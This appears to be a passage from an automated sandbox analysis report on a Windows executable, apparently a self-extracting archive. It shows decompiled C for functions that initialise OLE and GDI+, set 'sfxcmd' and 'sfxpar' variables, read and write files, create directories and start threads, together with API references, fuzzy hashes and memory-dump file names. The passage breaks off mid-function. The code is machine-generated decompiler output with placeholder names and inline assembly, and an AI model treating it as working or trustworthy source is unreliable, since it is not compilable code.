API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: c1b41da2d14110748508afa8e5cf6bfe762007a8ebebb83500a4722741c93ebb
Instruction ID: 2327092880aa488ae3e0d120264ebe342d554f305b400f3ea415da37effdf773
Opcode Fuzzy Hash: c1b41da2d14110748508afa8e5cf6bfe762007a8ebebb83500a4722741c93ebb
Instruction Fuzzy Hash: 5AF0E232A1132937D7309A64AC0AFEB776C9F86B00F440166FE05E30C0D770996186F5

Uniqueness

Uniqueness Score: -1.00%

Function 00279AA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00279AA0(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E0026FCFD(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0x29dffc(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0x29deb4( &_v16); // executed
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L0027D820(); // executed
				 *0x29df08(0x2a75c0,  &_v8,  &_v32, 0);
				return __ecx;
			}

0x00279aaf
0x00279ab6
0x00279ab9
0x00279ac2
0x00279aca
0x00279ad1
0x00279adb
0x00279ae6
0x00279aea
0x00279aed
0x00279af0
0x00279afa
0x00279b07

APIs

Part of subcall function 0026FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0026FD18
Part of subcall function 0026FCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,0026E7F6,Crypt32.dll,?,0026E878,?,0026E85C,?,?,?,?), ref: 0026FD3A

OleInitialize.OLE32(00000000), ref: 00279AB9
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00279AF0
SHGetMalloc.SHELL32(002A75C0), ref: 00279AFA

Strings

riched20.dll, xrefs: 00279AA8

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: 1cb37618f286cda75725ed0e002ab0f0214ad80efa7a87424aa1313ca3e1aa52
Instruction ID: 0c6025aa78a2cb00ff8d2fb545ca733813451573334102ec20f19934b17ef207
Opcode Fuzzy Hash: 1cb37618f286cda75725ed0e002ab0f0214ad80efa7a87424aa1313ca3e1aa52
Instruction Fuzzy Hash: 00F0F9B1D10209ABCB10EF99E849AEFFBFCEF95711F00416BE815A2240DBB456558FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0027C891, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0027C891(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E0027D940();
				SetEnvironmentVariableW(L"sfxcmd", _a4);
				_t7 = E0026F835(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E0026F94C() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
				}
				return _t7;
			}

0x0027c891
0x0027c899
0x0027c8a7
0x0027c8bc
0x0027c8c1
0x0027c8c5
0x0027c8ca
0x0027c8d4
0x0027c8cd
0x0027c8cd
0x0027c8d3
0x0027c8d3
0x0027c8e3
0x0027c8e3
0x0027c8ed

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0027C8A7
SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0027C8E3

Strings

sfxcmd, xrefs: 0027C8A2
sfxpar, xrefs: 0027C8DE

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: c2050505f832d18023dfe8a7aa477f11c67815734fe0bad5d5b93c33d8fd6773
Instruction ID: 6dcb324f19cf34d773b40c9d45f573511cb8bd8aedb749fb23e938d806a625e1
Opcode Fuzzy Hash: c2050505f832d18023dfe8a7aa477f11c67815734fe0bad5d5b93c33d8fd6773
Instruction Fuzzy Hash: 2DF0A772831225F6DB216FD5EC09FAA776C9F09B51B004096FD4C96142DA709870DBF1

Uniqueness

Uniqueness Score: -1.00%

Function 0026964A, Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0026964A(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00269745(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E0026964A(_t25);
						}
					}
				}
				return _t15;
			}

0x0026964d
0x00269650
0x00269656
0x00269660
0x00269660
0x00269672
0x0026967a
0x002696d6
0x0026967c
0x0026967e
0x00269685
0x0026969e
0x002696a2
0x002696b3
0x002696b7
0x002696d1
0x002696d1
0x002696c3
0x002696c3
0x002696cc
0x00000000
0x002696ce
0x002696ce
0x00000000
0x002696ce
0x002696cc
0x002696a4
0x002696a4
0x002696ad
0x00000000
0x002696af
0x002696af
0x002696af
0x002696ad
0x00269687
0x00269687
0x0026968f
0x00000000
0x00269691
0x00269691
0x00269692
0x00269692
0x00269697
0x00269697
0x0026968f
0x00269685
0x002696de

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0026965A
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00269672
GetLastError.KERNEL32 ref: 002696A4
GetLastError.KERNEL32 ref: 002696C3

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 7a7200cf2fc1c8c897ebea77dbc20793c6f7ad0826816707e91f55ce91ebebb2
Instruction ID: f7466494c06bf01ec0ce22673251bbbee9343d51f06d0c86f96c85f46d0a0a33
Opcode Fuzzy Hash: 7a7200cf2fc1c8c897ebea77dbc20793c6f7ad0826816707e91f55ce91ebebb2
Instruction Fuzzy Hash: 9911AC3092030AEFDB245F66D944A6977ADAB11320F10C52AF82A85190EFB48DF8DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00289A2C, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00289A2C(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x2c0768 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x295ba0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xd26a0a58
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00289a31
0x00289a35
0x00289a3c
0x00289a40
0x00289a4e
0x00289a5e
0x00289a64
0x00289a68
0x00289a91
0x00289a93
0x00289a97
0x00289a9a
0x00289a9a
0x00289aa0
0x00289aa2
0x00000000
0x00289aa3
0x00289a6a
0x00289a73
0x00289a82
0x00289a75
0x00289a78
0x00289a7e
0x00289a7e
0x00289a86
0x00000000
0x00289a88
0x00289a8b
0x00289a8d
0x00000000
0x00289a8d
0x00289a86
0x00289a42
0x00289a47
0x00000000

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00282E0F,00000000,00000000,?,002899D3,00282E0F,00000000,00000000,00000000,?,00289BD0,00000006,FlsSetValue), ref: 00289A5E
GetLastError.KERNEL32(?,002899D3,00282E0F,00000000,00000000,00000000,?,00289BD0,00000006,FlsSetValue,00296058,00296060,00000000,00000364,?,002885E8), ref: 00289A6A
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002899D3,00282E0F,00000000,00000000,00000000,?,00289BD0,00000006,FlsSetValue,00296058,00296060,00000000), ref: 00289A78

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: d84c8cff6499fe601e774f477efde0e317beaf5fd72094a7be9065b658bd2131
Instruction ID: 2ecf729c3d085305712846eb8f16f859e1ea238105924a13199c381728333cdf
Opcode Fuzzy Hash: d84c8cff6499fe601e774f477efde0e317beaf5fd72094a7be9065b658bd2131
Instruction Fuzzy Hash: 5501F73A362223EBC7259F68AC48A7677D8AF45BA17180221FD0AD32C0D731D874C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 002704F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E002704F5() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0x2a00e0 > 0) {
					_t18 = 0x2a00e4;
					do {
						_t7 = CreateThread(0, 0x10000, E0027062F, 0x2a00e0, 0,  &_v4); // executed
						_t22 = _t7;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0x2a00e0);
							E00266CC9(E0027E214(E00266CCE(0x2a00e0)), 0x2a00e0, 0x2a00e0, 2);
						}
						 *_t18 = _t22;
						 *0x002A01E4 =  *((intOrPtr*)(0x2a01e4)) + 1;
						_t8 =  *0x2a7368; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0x2a00e0);
					return _t8;
				}
				return _t5;
			}

0x002704fa
0x002704fe
0x00270502
0x00270505
0x00270519
0x0027051f
0x00270523
0x00270525
0x0027052a
0x00270547
0x00270547
0x0027054c
0x0027054e
0x00270554
0x0027055b
0x00270560
0x00270560
0x00270566
0x00270567
0x0027056a
0x00000000
0x0027056f
0x00270573

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_0001062F,?,00000000,00000000), ref: 00270519
SetThreadPriority.KERNEL32(?,00000000), ref: 00270560

Part of subcall function 00266CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00266CEC

Strings

CreateThread failed, xrefs: 00270525

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: f25817d08efda460cbabc73ea25f870be990102e213daf448969d39f4fcde440
Instruction ID: 6292daa5ad0478a31ece419956205c8f1aef11c562bf6a505276c274e1d760d1
Opcode Fuzzy Hash: f25817d08efda460cbabc73ea25f870be990102e213daf448969d39f4fcde440
Instruction Fuzzy Hash: 9101D6B1364302EBD7246F50ACC9F6777A9EB45751F10402EF689A2181CEB168AC8E30

Uniqueness

Uniqueness Score: -1.00%

Function 00269C34, Relevance: 4.6, APIs: 3, Instructions: 96
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00269C34(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
				void* __ebp;
				int _t24;
				long _t32;
				void* _t36;
				void* _t42;
				void* _t52;
				intOrPtr* _t53;
				void* _t57;
				intOrPtr _t58;
				long _t59;

				_t52 = __edx;
				_t59 = _a8;
				_t53 = __ecx;
				if(_t59 != 0) {
					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
						 *(_t53 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						_a8 = _a8 & 0x00000000;
						_t42 = 0;
						if( *((intOrPtr*)(_t53 + 0xc)) == 0) {
							goto L12;
						}
						_t57 = 0;
						if(_t59 == 0) {
							L14:
							if( *((char*)(_t53 + 0x14)) == 0 ||  *((intOrPtr*)(_t53 + 0xc)) != 0) {
								L21:
								 *((char*)(_t53 + 8)) = 1;
								return _t42;
							} else {
								_t56 = _t53 + 0x1e;
								if(E00266C55(0x2a00e0, _t53 + 0x1e, 0) == 0) {
									E00266E9B(0x2a00e0, _t59, 0, _t56);
									goto L21;
								}
								if(_a8 < _t59 && _a8 > 0) {
									_t58 =  *_t53;
									_t36 =  *((intOrPtr*)(_t58 + 0x14))(0);
									asm("sbb edx, 0x0");
									 *((intOrPtr*)(_t58 + 0x10))(_t36 - _a8, _t52);
								}
								continue;
							}
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_t32 = _t59 - _t57;
							if(_t32 >= 0x4000) {
								_t32 = 0x4000;
							}
							_t10 = WriteFile( *(_t53 + 4), _a4 + _t57, _t32,  &_a8, 0) - 1; // -1
							asm("sbb bl, bl");
							_t42 =  ~_t10 + 1;
							if(_t42 == 0) {
								goto L14;
							}
							_t57 = _t57 + 0x4000;
							if(_t57 < _t59) {
								continue;
							}
							L13:
							if(_t42 != 0) {
								goto L21;
							}
							goto L14;
						}
						goto L14;
						L12:
						_t24 = WriteFile( *(_t53 + 4), _a4, _t59,  &_a8, 0); // executed
						asm("sbb al, al");
						_t42 =  ~(_t24 - 1) + 1;
						goto L13;
					}
				}
				return 1;
			}

0x00269c34
0x00269c35
0x00269c3a
0x00269c3e
0x00269c4b
0x00269c55
0x00269c55
0x00269c5a
0x00269c5a
0x00269c5f
0x00269c65
0x00000000
0x00000000
0x00269c67
0x00269c6b
0x00269ccf
0x00269cd3
0x00269d2d
0x00269d30
0x00000000
0x00269cdb
0x00269cdd
0x00269ced
0x00269d28
0x00000000
0x00269d28
0x00269cf3
0x00269d04
0x00269d0a
0x00269d13
0x00269d18
0x00269d18
0x00000000
0x00269cf3
0x00000000
0x00000000
0x00000000
0x00269c6d
0x00269c6d
0x00269c6f
0x00269c76
0x00269c78
0x00269c78
0x00269c95
0x00269c9a
0x00269c9c
0x00269c9f
0x00000000
0x00000000
0x00269ca1
0x00269ca9
0x00000000
0x00000000
0x00269ccb
0x00269ccd
0x00000000
0x00000000
0x00000000
0x00269ccd
0x00000000
0x00269cad
0x00269cbc
0x00269cc5
0x00269cc9
0x00000000
0x00269cc9
0x00269c5a
0x00000000

APIs

GetStdHandle.KERNEL32(000000F5,?,?,0026C90A,00000001,?,?,?,00000000,00274AF4,?,?,?,?,?,00274599), ref: 00269C4F
WriteFile.KERNEL32(?,00000000,?,002747A1,00000000), ref: 00269C8F
WriteFile.KERNELBASE(?,00000000,?,002747A1,00000000), ref: 00269CBC

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: b0d7dec931c110fdbbe2dc639367a8e46c73653f5fda50f3fe13a86de1ea6ef8
Instruction ID: 07b3cb01293b758e35351cecaa7ab01667f53ed51d34a8bc130ba1f5a9271acd
Opcode Fuzzy Hash: b0d7dec931c110fdbbe2dc639367a8e46c73653f5fda50f3fe13a86de1ea6ef8
Instruction Fuzzy Hash: B531457122420AEFDB209E20C848BA6B7ECFF55310F00811BF29597190CF74A8F8CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00269EF2, Relevance: 4.6, APIs: 3, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00269EF2(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E0027D940();
				_t21 = _a4;
				_t8 =  *(E0026B927(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E00269E6B(_t21) != 0 || E0026B32C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E0026A12F(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}

0x00269efa
0x00269f00
0x00269f09
0x00269f0f
0x00269f23
0x00269f2b
0x00269f69
0x00269f6f
0x00269f72
0x00269f7e
0x00269f80
0x00269f74
0x00269f74
0x00269f77
0x00000000
0x00269f79
0x00269f7b
0x00269f7b
0x00269f77
0x00000000
0x00000000
0x00000000
0x00269f16
0x00269f19
0x00269f21
0x00269f56
0x00269f5a
0x00269f60
0x00269f60
0x00269f65
0x00000000
0x00000000
0x00000000
0x00269f21
0x00269f85

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00269DFE,?,00000001,00000000,?,?), ref: 00269F19
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00269DFE,?,00000001,00000000,?,?), ref: 00269F4C
GetLastError.KERNEL32(?,?,?,?,00269DFE,?,00000001,00000000,?,?), ref: 00269F69

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 230262f70fcda055a29f0d53d47d2ccd1a9459b368e1165477e6b7e550442770
Instruction ID: e2d1dcec6c0975020ddb64b2f535345ed6f53b28f9d0c7a3515839397f213a87
Opcode Fuzzy Hash: 230262f70fcda055a29f0d53d47d2ccd1a9459b368e1165477e6b7e550442770
Instruction Fuzzy Hash: 8C01D431638215A6DB31AFA49C89BFE335C9F06740F250442F905E6492DFB4C9F1CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 0026C4CA, Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0026C4CA(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __esi;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t29;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t44;
				void* _t46;
				void* _t49;

				_t49 = __eflags;
				_t39 = __edx;
				_t29 = __ecx;
				E0027D870(E002913CA, _t46);
				_push(_t29);
				_push(_t29);
				_t44 = _t29;
				 *((intOrPtr*)(_t46 - 0x10)) = _t44;
				E0026A51E(_t44 + 0x90);
				_t41 = 0;
				 *((intOrPtr*)(_t46 - 4)) = 0;
				E0026A51E(_t44 + 0xa4);
				 *((char*)(_t46 - 4)) = 1;
				E0026A51E(_t44 + 0xb8);
				 *((char*)(_t46 - 4)) = 2;
				_t21 = E0027D82C(_t39, _t44, _t49, 0x10c0); // executed
				 *((intOrPtr*)(_t46 - 0x14)) = _t21;
				 *((char*)(_t46 - 4)) = 3;
				_t50 = _t21;
				if(_t21 == 0) {
					_t22 = 0;
				} else {
					_t22 = E00265E99(_t21, _t39, _t50);
				}
				 *((char*)(_t46 - 4)) = 2;
				 *((intOrPtr*)(_t44 + 0x40)) = _t22;
				_t23 = E0027D82C(_t39, _t44, _t50, 0x10c0);
				 *((intOrPtr*)(_t46 - 0x14)) = _t23;
				 *((char*)(_t46 - 4)) = 4;
				if(_t23 != 0) {
					_t41 = _t23;
				}
				 *((intOrPtr*)(_t44 + 0x44)) = _t41;
				E0026C5C9(_t23, _t44);
				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
				return _t44;
			}

0x0026c4ca
0x0026c4ca
0x0026c4ca
0x0026c4cf
0x0026c4d4
0x0026c4d5
0x0026c4d8
0x0026c4db
0x0026c4e4
0x0026c4e9
0x0026c4f1
0x0026c4f4
0x0026c4ff
0x0026c503
0x0026c50d
0x0026c512
0x0026c518
0x0026c51b
0x0026c51f
0x0026c521
0x0026c52c
0x0026c523
0x0026c525
0x0026c525
0x0026c52f
0x0026c533
0x0026c536
0x0026c53c
0x0026c53f
0x0026c545
0x0026c54e
0x0026c54e
0x0026c552
0x0026c555
0x0026c562
0x0026c56c

APIs

__EH_prolog.LIBCMT ref: 0026C4CF
new.LIBCMT ref: 0026C512
new.LIBCMT ref: 0026C536

Part of subcall function 00265E99: __EH_prolog.LIBCMT ref: 00265E9E

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9b018964af2e859c50af62684bb52d70fca0482fd4376b75a6cddad82dfd611b
Instruction ID: 3916f712b1d477919607dcc4261f517944cdd7cbac9deea12ea0ccabd9e936f5
Opcode Fuzzy Hash: 9b018964af2e859c50af62684bb52d70fca0482fd4376b75a6cddad82dfd611b
Instruction Fuzzy Hash: 2E11A371A20244DADB14EBB8D9457BEB7F4DF44300F10446EA44AE3242DB74AE50CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0026399D, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0026399D(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t123;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				_t123 = __ecx;
				E0027D870(E002911BE, _t153);
				E0027D940();
				_t151 = _t123;
				_t156 =  *((char*)(_t151 + 0x6cc4));
				if( *((char*)(_t151 + 0x6cc4)) == 0) {
					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E0026134C(__eflags, 0x1e, _t151 + 0x1e);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E0026C5C9(_t83, _t120);
						_push(_t120);
						E002714DE(_t153 - 0xe6ec, __eflags); // executed
						_t121 = 0;
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E00272842(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E0026A728(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
								 *((char*)(_t151 + 0x2110)) = _t121;
								E0026C67C(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E002724D9(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
